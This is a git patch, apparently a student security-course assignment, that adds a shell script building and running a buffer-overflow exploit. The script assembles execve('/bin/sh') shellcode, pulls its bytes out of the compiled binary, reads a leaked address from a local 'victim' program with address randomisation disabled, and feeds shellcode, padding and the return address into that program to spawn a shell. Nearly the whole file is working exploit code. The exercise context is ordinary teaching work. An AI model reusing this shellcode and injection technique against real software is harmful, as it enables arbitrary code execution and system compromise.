From 29d4f26127ef8f3925df8437b41c89e3093d3508 Mon Sep 17 00:00:00 2001
From: Camil Staps
Date: Tue, 29 Dec 2015 21:59:09 +0100
Subject: Assignment 6

---
 CamilStaps-s4498062-Assignment-6/ex2.sh | 15 +++++++++++++++
 1 file changed, 15 insertions(+)
 create mode 100755 CamilStaps-s4498062-Assignment-6/ex2.sh

(limited to 'CamilStaps-s4498062-Assignment-6/ex2.sh')

diff --git a/CamilStaps-s4498062-Assignment-6/ex2.sh b/CamilStaps-s4498062-Assignment-6/ex2.sh
new file mode 100755
index 0000000..0a86bf5
--- /dev/null
+++ b/CamilStaps-s4498062-Assignment-6/ex2.sh
@@ -0,0 +1,15 @@
+echo 'int main() {\n  asm("\\\nneedle0: jmp there\\n\\\nhere:    pop %rdi\\n\\\n         xor %rax, %rax\\n\\\n         movb $0x3b, %al\\n\\\n         xor %rsi, %rsi\\n\\\n         xor %rdx, %rdx\\n\\\n         syscall\\n\\\nthere:   call here\\n\\\n.string \\"/bin/sh\\"\\n\\\nneedle1: .octa 0xdeadbeef\\n\\\n  ");\n}' > shell.c 
+gcc shell.c
+
+start=`objdump -d a.out | grep '<needle0>:' | cut -f 1 -d ' '`
+end=`objdump -d a.out | grep '<needle1>:' | cut -f 1 -d ' '`
+start=$((0x$start-0x400000))
+end=$((0x$end-0x400000))
+l=$((end-start))
+while [ ! $((l % 32)) -eq 0 ]; do l=$((l+1)); done
+xxd -s0x`printf %x $start` -l$l -p a.out shellcode
+
+a=$(echo "Camil" | setarch `arch` -R ./victim | head -n1)
+a=$(printf %016x $a | tac -rs..)
+( ( cat shellcode ; printf "%0464d" 0 ; echo $a ) | xxd -r -p ; cat ) | setarch `arch` -R ./victim
+
-- 
cgit v1.2.3